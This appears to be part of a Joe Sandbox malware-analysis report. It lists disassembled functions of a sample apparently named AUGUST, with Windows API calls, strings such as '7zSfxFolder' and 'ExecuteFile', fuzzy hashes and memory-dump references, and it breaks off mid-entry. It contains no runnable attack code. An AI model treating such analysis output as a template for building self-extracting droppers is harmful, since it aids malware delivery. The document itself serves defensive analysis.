Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E

Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
SendMessageW.USER32(00008001,00000000,?), ref: 004011FF

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__set_app_type.MSVCRT ref: 00411E1C
__p__fmode.MSVCRT ref: 00411E31
__p__commode.MSVCRT ref: 00411E3F
__setusermatherr.MSVCRT ref: 00411E6B
_initterm.MSVCRT ref: 00411E81
__getmainargs.MSVCRT ref: 00411EA4
_initterm.MSVCRT ref: 00411EB4
GetStartupInfoA.KERNEL32(?), ref: 00411EF3
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00411F17
exit.KERNELBASE ref: 00411F27
_XcptFilter.MSVCRT ref: 00411F39

Strings

HpA, xrefs: 00411E9C, 00411E9F

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: HpA
API String ID: 801014965-2938899866
Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58

Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
DispatchMessageW.USER32(?), ref: 00401B89
KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

Strings

Static, xrefs: 00401B5A

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298

Strings

, xrefs: 0040B22D

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@memcpymemmove
String ID:
API String ID: 3549172513-3916222277
Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

Function 00403354 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D

Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171

memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
wsprintfW.USER32 ref: 004044A7

Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71

#17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533

Strings

7zSfxFolder%02d, xrefs: 004044A1
IA, xrefs: 0040447B

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d$IA
API String ID: 3387708999-1317665167
Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59

Strings

IA, xrefs: 00409391
IA, xrefs: 00409225

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@
String ID: IA$IA
API String ID: 1033339047-1400641299
Opcode ID: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
Opcode Fuzzy Hash: ade758c57321b25e9a53a0c33f99253ab3068af0158966582580042e8f9f7447
Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00410D0D

Strings

4KA, xrefs: 00410CF0
$KA, xrefs: 00410CF7
\KA, xrefs: 00410CE2
HKA, xrefs: 00410CE9

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: free
String ID: $KA$4KA$HKA$\KA
API String ID: 1294909896-3316857779
Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004096D0
??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941

Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B

Strings

HIA, xrefs: 0040978B

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@$H_prolog
String ID: HIA
API String ID: 3431946709-2712174624
Opcode ID: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
Opcode Fuzzy Hash: 5664c2804fe39f9fee2805cb412b18014b96d9821453edab9864f4d5d9c1b48b
Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
memcmp.MSVCRT(?,?,?), ref: 004028E4
memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: lstrlenmemcmp$memmove
String ID:
API String ID: 3251180759-0
Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570

Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000010,?,00405D20,?,00417788,00417788), ref: 00404A5A
??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC

Strings

ExecuteFile, xrefs: 00404A48

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@
String ID: ExecuteFile
API String ID: 1033339047-323923146
Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A

Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

